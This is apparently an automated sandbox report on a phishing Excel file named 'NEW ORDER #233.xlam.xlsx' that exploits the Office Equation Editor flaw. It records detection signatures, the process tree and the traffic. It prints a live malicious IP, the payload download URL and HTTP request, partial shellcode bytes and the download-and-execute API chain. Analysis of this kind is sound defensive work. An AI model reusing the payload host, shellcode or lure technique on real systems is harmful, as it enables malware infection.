Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW ORDER #233.xlam.xlsx

Overview

General Information

Sample name:NEW ORDER #233.xlam.xlsx
Analysis ID:1567379
MD5:817ecb59ef716e826713794fb215add4
SHA1:52865450845daedc23980b99f3587f603aa2911a
SHA256:00e0a23a8c9535c0dc34176236e97215aae4a1d0a897729b632ebf21ee45ce53
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential downloader shellcode found
Shellcode detected
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to read the PEB
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3428 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3648 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x108a:$s1: <legacyDrawing r:id="
  • 0x10b2:$s2: <oleObject progId="
  • 0x1103:$s3: autoLoad="true"

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 87.120.84.39, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3648, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: NEW ORDER #233.xlam.xlsxAvira: detected
Source: NEW ORDER #233.xlam.xlsxReversingLabs: Detection: 76%

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.39 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410367 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_03410367
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410367 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_03410367
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034103E8 URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_034103E8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410422 CreateProcessW,ExitProcess,2_2_03410422
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0341045B ExitProcess,2_2_0341045B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034102E5 URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_034102E5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410381 URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_03410381
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410401 CreateProcessW,ExitProcess,2_2_03410401
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034102B0 ExitProcess,2_2_034102B0
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49163
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410367 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_03410367
Source: Joe Sandbox ViewIP Address: 87.120.84.39 87.120.84.39
Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
Source: global trafficHTTP traffic detected: GET /txt/x0C0Zc8JHYzAip.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410367 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_03410367
Source: global trafficHTTP traffic detected: GET /txt/x0C0Zc8JHYzAip.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.513605961.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/x0C0Zc8JHYzAip.exe
Source: EQNEDT32.EXE, 00000002.00000002.513605961.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/x0C0Zc8JHYzAip.exeN
Source: EQNEDT32.EXE, 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/x0C0Zc8JHYzAip.exej

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: NEW ORDER #233.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal96.expl.winXLSX@3/2@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$NEW ORDER #233.xlam.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR895A.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: NEW ORDER #233.xlam.xlsxReversingLabs: Detection: 76%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: NEW ORDER #233.xlam.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: NEW ORDER #233.xlam.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3668Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-3414
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-3462
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-3506
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-4131
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-3448
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03410462 mov edx, dword ptr fs:[00000030h]2_2_03410462
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts32
Exploitation for Client Execution
2
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive12
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
NEW ORDER #233.xlam.xlsx76%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
NEW ORDER #233.xlam.xlsx100%AviraEXP/CVE-2018-0798.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exe0%Avira URL Cloudsafe
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exeN0%Avira URL Cloudsafe
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exej0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exetrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exeNEQNEDT32.EXE, 00000002.00000002.513605961.0000000000690000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://87.120.84.39/txt/x0C0Zc8JHYzAip.exejEQNEDT32.EXE, 00000002.00000002.513687352.0000000003410000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
87.120.84.39
unknownBulgaria
51189SHARCOM-ASBGtrue
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1567379
Start date and time:2024-12-03 14:42:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:NEW ORDER #233.xlam.xlsx
Detection:MAL
Classification:mal96.expl.winXLSX@3/2@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 8
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: NEW ORDER #233.xlam.xlsx
TimeTypeDescription
08:43:59API Interceptor270x Sleep call for process: EQNEDT32.EXE modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
87.120.84.39Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/mydocfile.wbk
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/mydocfile.wbk
dattizxmn.dot.rtfGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattimnzx.vbs
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattizxmn.dot
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattizxmn.dot
Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe
Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/xXdquUOrM1vD3An.exe
blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/blhbZrtqbLg6O1K.exe
Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/blhbZrtqbLg6O1K.exe
2 Payment Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/blhbZrtqbLg6O1K.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
SHARCOM-ASBGBank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
dattizxmn.dot.rtfGet hashmaliciousUnknownBrowse
  • 87.120.84.39
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39
SOA.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39
blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39
Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39
No context
No context
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):165
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fV:vBFFGS
MD5:797869BB881CFBCDAC2064F92B26E46F
SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:false
Reputation:high, very likely benign file
Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):165
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fV:vBFFGS
MD5:797869BB881CFBCDAC2064F92B26E46F
SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:true
Reputation:high, very likely benign file
Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
File type:Microsoft Excel 2007+
Entropy (8bit):7.850099552908346
TrID:
  • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
  • ZIP compressed archive (8000/1) 18.60%
File name:NEW ORDER #233.xlam.xlsx
File size:13'630 bytes
MD5:817ecb59ef716e826713794fb215add4
SHA1:52865450845daedc23980b99f3587f603aa2911a
SHA256:00e0a23a8c9535c0dc34176236e97215aae4a1d0a897729b632ebf21ee45ce53
SHA512:0f50c9d7bb93401009bc247199f33f7186dd6a67055ee442c0e9498d756f8717626c7d595c9eeb23d690a2d0edc95fa9abdb8f635810ec669b28c1de6b21318a
SSDEEP:384:ya1L48qmNGgYg12HfUy/CAgiOMeuFQlvI/a:yadfqmzJiQuStv
TLSH:0E528D658D23846CC3442479804C36C5CB35B791526B2BA33D38F16D39EEFD627A9F8A
File Content Preview:PK.........!.Y.}.g............[Content_Types].xmlUT.....Ng..Ng..Ng.U.N.0....;D........).`...<...6.......w... .Z.i..(......gg.g.5&2..bZMD.^.m....w..SQP.......".......6".....m.....Zt@U..ye.....i)#..,Q.O&'R....2w.b>...<.\\n..NIc.(.w.:.Z@..(..,.^.#).ba......T
Icon Hash:2562ab89a7b7bfbf
Document Type:OpenXML
Number of OLE Files:1
Has Summary Info:
Application Name:
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:False
Author:Modexcomm
Last Saved By:Modexcomm
Create Time:2019-11-27T09:20:57Z
Last Saved Time:2023-08-29T02:40:44Z
Creating Application:Microsoft Excel
Security:0
Thumbnail Scaling Desired:false
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:12.0000
General
Stream Path:\x1olE10NativE
CLSID:
File Type:data
Stream Size:1322
Entropy:7.492281067435018
Base64 Encoded:False
Data ASCII:[ . . ~ . G . . . - . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) D . . . . . . . & . . . F . . 1 ' R . . . . G . . . . . . ; . . . . . . . . ~ # - . . . . . . . Y i , . f \\ . * ' m A . . 9 " f M . . . . C . . . k . v . . . d 1 . e . 7 X C Z E [ . . . O K H = 9 . f 4 . . . B O . r g . . . / . . t # . ^ 7 X M . B @ . . . \\ < k . . Z D . 5 . g . e P ] . . . L . . ' . x . . . ; . q . + D 0 ) B 9 z . D Z K n . 3 n . ( 4 1 m b o + 4 2 . p
Data Raw:5b ba 8a 06 02 7e 01 eb 47 0a 01 05 2d b1 d8 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e9 85 00 00 00 eb 26 e9 da 00 00 00 eb 46 eb 08 90 83 c1 04 eb 31 eb 27 eb 52 eb 1d e9 ae 00 00 00 eb 47 e9 be 00 00 00 e9 a0 00 00 00 eb 3b e9
TimestampSource PortDest PortSource IPDest IP
Dec 3, 2024 14:44:01.792975903 CET4916380192.168.2.2287.120.84.39
Dec 3, 2024 14:44:01.913094997 CET804916387.120.84.39192.168.2.22
Dec 3, 2024 14:44:01.913301945 CET4916380192.168.2.2287.120.84.39
Dec 3, 2024 14:44:01.913538933 CET4916380192.168.2.2287.120.84.39
Dec 3, 2024 14:44:02.033427954 CET804916387.120.84.39192.168.2.22
Dec 3, 2024 14:44:23.823295116 CET804916387.120.84.39192.168.2.22
Dec 3, 2024 14:44:23.823386908 CET4916380192.168.2.2287.120.84.39
Dec 3, 2024 14:44:23.823499918 CET4916380192.168.2.2287.120.84.39
Dec 3, 2024 14:44:23.943372011 CET804916387.120.84.39192.168.2.22
  • 87.120.84.39
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.224916387.120.84.39803648C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
TimestampBytes transferredDirectionData
Dec 3, 2024 14:44:01.913538933 CET321OUTGET /txt/x0C0Zc8JHYzAip.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 87.120.84.39
Connection: Keep-Alive


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:08:43:10
Start date:03/12/2024
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:0x13f8e0000
File size:28'253'536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
